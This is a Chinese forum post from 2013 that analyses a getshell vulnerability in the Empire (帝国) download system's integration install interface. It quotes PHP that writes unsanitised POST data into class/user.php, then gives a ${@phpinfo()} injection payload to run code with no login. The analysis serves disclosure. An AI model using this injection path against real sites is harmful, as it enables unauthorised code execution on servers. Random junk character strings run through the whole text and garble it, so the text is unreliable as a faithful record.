这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们# ^, v/ E; A+ m$ _
3 J) P4 R' |# f& M b4 m% L3 Y w
$ H' t: I, d( z" E% w/ v: v这是帝国的一套下载系统 如图. M( C/ V7 V$ g7 e
ps(不需要任何账户和密码,直接写shell)
5 B! W8 m3 G& }! b* r5 _; ?由于很多站是由于下载要整合discuz 等等一些论坛....& ~+ x$ \. V0 o; h
% Y' [0 M8 P3 D. [" l5 [& W# U9 \而帝国他又有一个万能接口,如图 ( s. x$ k, z7 L0 \
: @8 t& y3 D2 r+ ?0 \ z) _3 q7 t$ J) ~5 c7 x* D; @$ k C/ n
而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
2 D) _/ x ?: p8 K1 C$ A) ^
3 b& I e; P/ {# U当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
/ f: s3 z) v' }2 |0 }, L7 J ]
: F7 h4 I1 ^5 N0 ?! e在data/fun.php中的15行7 p. j! |+ b" u
9 E2 i4 S* i# z F: Z# p
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {) p. z- `' p4 h, {
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干/ {/ x1 J8 ~. S2 X0 s) O% A
& V4 U) N' _" }) a9 H" L$ l这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);; B* F* ` E/ @& f
% n- K0 x F- k( j! p$ t他将传进来的变量进行了切割,然后赋给了$filetext
' _, C3 G! w7 a- L# G
! k5 I6 P& @0 @, Z# ?8 O9 t! H然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了 @; r ?$ k( C, R+ F) |
( f$ V+ y+ \1 u9 q6 o我们看看写入的结果,随便填一个
$ Q7 O8 D; S: g/ c2 ]9 {6 B
; I( W+ J$ M' q M
% U! D k4 {2 I2 [% y) I* i4 ]
0 v. v7 r, U" h2 h1 ?1 J; ^- G J. ?; y3 V. C; }
+ H! Q. `/ b. ~& ?& C
6 @0 ^) S4 p( C* H) H: X
. _ f2 f$ ?) J
& ~. X! K. Y- a$ k, }# u5 w0 T( |/ S# h6 E. J! h; C- r
]) R. j! o7 ~1 F" A5 ]/ X6 `9 O% a! V& g- d% G* ]
h" N* {9 q- E1 l3 W% V [+ w1 M& b8 Q8 R6 \& Q9 h8 O4 s( ^4 ]
9 D. l# O3 C( e
# w( W$ t" M D
' D/ R9 E7 x6 `5 r
3 H$ R% n2 E9 C2 Q. Q2 I7 I% c5 G! X8 K) `5 D
* D9 S5 D8 Z4 a/ T" H2 H6 A
9 X8 j1 V2 b; z
+ p9 f s e6 ^
所以我们淫荡点,写个${@phpinfo()}试试
; c2 @# y, H5 p7 n, m# s/ Z然后访问以下class/user.php这个文件
$ `3 o/ N/ {* p6 O日了吧
- B/ B0 p8 x! d6 }: k* s {4 I5 x# k# O: V7 o& J" [; o0 C
1 R; R1 I/ g9 K5 Q- A
$ l+ _$ h; j! I. A6 _
. l/ q! O4 a0 X7 Q0 V
0 G- ^4 F |# Q4 g | 
发表于 2013-1-23 09:34:37
收藏
支持
反对